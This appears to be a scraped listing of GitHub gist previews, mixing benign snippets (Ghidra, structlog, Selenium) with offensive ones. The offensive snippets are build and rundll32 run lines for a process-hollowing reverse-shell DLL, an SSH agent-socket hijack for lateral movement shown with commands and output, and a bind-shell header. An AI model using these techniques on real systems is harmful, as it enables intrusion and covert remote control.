FrankSpierings

#Example of showing function call parameters within a function using the decompiler.
#@author Frank Spierings
#@category 
#@keybinding 
#@menupath 
#@toolbar 

import ghidra.app.decompiler.DecompInterface as DecompInterface
import ghidra.app.decompiler.ClangTokenGroup as ClangTokenGroup

scragly

Requires Python 3.6+

Only 3rd party dependancy is the Requests library. Install it with: python3 -m pip install requests

11philip22

// docker run -it --rm -v `pwd`:/tmp/building  ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe

simonw

# Use it like this:
#
# structlog.configure(
#     processors=[
#         structlog.processors.JSONRenderer(),
#         LogToSqlite("/tmp/logs.db")
#     ]
# )
# log = structlog.get_logger()
# log.msg("say-hello", whom="world", num=[random.randint(1,55)])

sousatg

#!/usr/bin/env python
# -*- coding: utf-8 -*-

import requests, time
from lxml import etree

class TwitterHammer:
	def __init__(self, username, password):
		self.username = username
		self.password = password

geyslan

// This is a snippet of the original file in https://github.com/geyslan/SLAE/blob/master/1st.assignment/shell_bind_tcp.c

#include <sys/socket.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <stdlib.h>
#include <unistd.h>

int main()
{

FrankSpierings

// docker run -it --rm -v `pwd`:/tmp/building  ubuntu bash -c "cd /tmp/building; apt update && apt install -y mingw-w64 upx && i686-w64-mingw32-gcc -O3 -s process-hollow-shell-dll.c -lws2_32 -lntdll -shared -o process-hollow-shell.dll; upx --ultra-brute process-hollow-shell.dll"
//
// Use -DDEBUG at compile time, for the logging printf messages.
// Use -DNON_MS_DLL_BLOCK at compile time, to block injection of non Microsoft DLL's into the host process.
// Use -DWAITFOR at compile time, to wait for the host process to finish.
//
// Run:
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe
//    rundll32 process-hollow-shell.dll,main 127.0.0.1 4444 c:\windows\system32\cmd.exe c:\windows\system32\notepad.exe

hibariya

OBJECTS = func.o main.o
CC = gcc
CFLAGS = -std=c11 -m32 -Wall -Wextra -Werror -c
AS = nasm
ASFLAGS = -f elf

all: $(OBJECTS)
	gcc -m32 $(OBJECTS) -o main

run: all

int0x80

Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.

root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460

root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld

user@internal:~$ hostname -f
internal.company.tld

anhldbk

from selenium import webdriver
driver = webdriver.Firefox()
driver.get('https://www.facebook.com/')

with open('jquery-1.9.1.min.js', 'r') as jquery_js: 
    jquery = jquery_js.read() #read the jquery from a file
    driver.execute_script(jquery) #active the jquery lib
    driver.execute_script("$('#email').text('anhld')")